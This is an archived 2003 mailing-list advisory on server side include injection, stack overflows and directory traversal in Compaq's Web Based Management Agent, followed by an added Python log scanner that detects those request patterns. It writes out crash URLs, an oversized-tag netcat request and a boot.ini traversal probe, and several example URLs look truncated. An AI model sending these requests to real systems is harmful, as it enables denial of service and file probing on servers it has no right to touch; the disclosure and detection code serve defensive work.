[VulnWatch] SSI vulnerability in Compaq Web Based Management Agent

From: Ian Vitek (ian.vitek_at_as5-5-7.bi.s.bonet.se)
Date: 06/30/03

    Date: Mon, 30 Jun 2003 20:28:00 +0200 (CEST)
    To: <vulnwatch@vulnwatch.org>
    
    

    SSI vulnerability in Compaq Web Based Management Agent
    ======================================================

    Type of vulnerabilities:
      Server Side Include injection. Exploitable.
      Stack overflows and access violations. Exploitable?
      Creation of script objects. Exploitable?

    Affected Software: Compaq Web Based Management Agent
    Verified Platforms: Windows

    Background and problem description
    ==================================
    Bashis (bash at wcd.se) has found several vulnerabilities
    in Compaq Web Based Management Agent. This Agent runs on
    TCP port 2301 (HTTP) or 2381 (HTTPS).
    The agent uses "tags" to run functions at the server side.
    To list all tags:
    http://IP:2301/>

    To crash the agent:
    http://IP:2301/<!>
    Stack overflow (0xc00000fd), Address: 0x77f0c3dc
    http://IP:2301/survey/<!>
    Stack overflow (0xc00000fd), Address: 0x10039869

    This crashes the agent too:
    http://IP:2301/>
    Stack overflow (0xc00000fd), Address: 0x77f0c3dc
    http://IP:2301/>
    Stack overflow (0xc00000fd), Address: 0x77f0c3dc
    http://IP:2301/survey/>
    Stack overflow (0xc00000fd), Address: 0x10039869

    The cause could be an endless loop (the result
    contains a tag to display a URL, and the result
    contains a tag to display a URL, and the result...)

    More strange stack overflows:
    http://IP:2301/>
    Stack overflow (0xc00000fd), Address: 0x77f0c3dc

    Many tags take input that seems vulnerable:
    http://IP:2301/>
    Stack overflow (0xc00000fd), Address: 0x77f0c3dc

    Sending the following with netcat:
    GET /<!.FunctionContentType=(about 250 "A" characters)> HTTP/1.0
    Access violation (0xc0000005), Address: 0x100368a5

    Check file existence. (with a nice 'input box')
    http://IP:2301/>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini

    It looks like you could create script objects.
    Check the tags with <!.TableDisplayTags>. Some of the
    CreateObject tags have the parameter 'script'.
    I don't know if it could be done though.

    Is this just another remote DoS?

    I have mailed HP (security-alert@hp.com) and got an automated
    response 28/5 2003.

    If someone wants to forward this mail they may do so.

    To all of my friends; See you in Vegas!
    The Swedes are coming.
    //Ian Vitek
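
Added example, not part of the original post or of any HP code: a small log scanner that flags the request shapes the advisory describes for the agent on ports 2301/2381, namely `<!...>` tags in the request path, oversized tags, and directory traversal in the `Url` parameter. The log line format, the finding labels, the 200-character threshold and the `/index.htm` and `/page` paths are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Assumption: flag tags longer than this; the advisory reports an access
# violation with a tag parameter of about 250 characters.
MAX_TAG_LEN = 200
TAG_RE = re.compile(r"<!(.*?)(?:>|$)", re.S)
REQ_RE = re.compile(r'^(\S+) "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_unquote(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is also seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_target(target):
    """Return sorted finding labels for one request target."""
    path, _, query = target.partition("?")
    findings = set()
    for match in TAG_RE.finditer(fully_unquote(path)):
        findings.add("ssi-tag-in-path")
        if len(match.group(1)) > MAX_TAG_LEN:
            findings.add("oversized-tag")
    for value in parse_qs(query).get("Url", []):
        parts = fully_unquote(value).replace("\\", "/").split("/")
        if ".." in parts:
            findings.add("url-param-traversal")
    return sorted(findings)

def scan(lines):
    """Yield (source, findings) for each log line with a finding."""
    for line in lines:
        m = REQ_RE.match(line)
        if m and (found := classify_target(m.group(2))):
            yield m.group(1), found

# Constructed sample log (hypothetical format, documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 "GET /index.htm HTTP/1.0"',
    '192.0.2.11 "GET /survey/%3C%21%3E HTTP/1.0"',
    '192.0.2.12 "GET /<!.FunctionContentType=' + "A" * 250 + '> HTTP/1.0"',
    '192.0.2.13 "GET /page?Url=%2F..%2F..%2Fboot.ini HTTP/1.0"',
]

if __name__ == "__main__":
    for source, found in scan(SAMPLE_LOG):
        print(source, ", ".join(found))
```

The same checks can be applied at a reverse proxy or IDS in front of the management ports, where matching requests can be dropped before they reach the agent.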

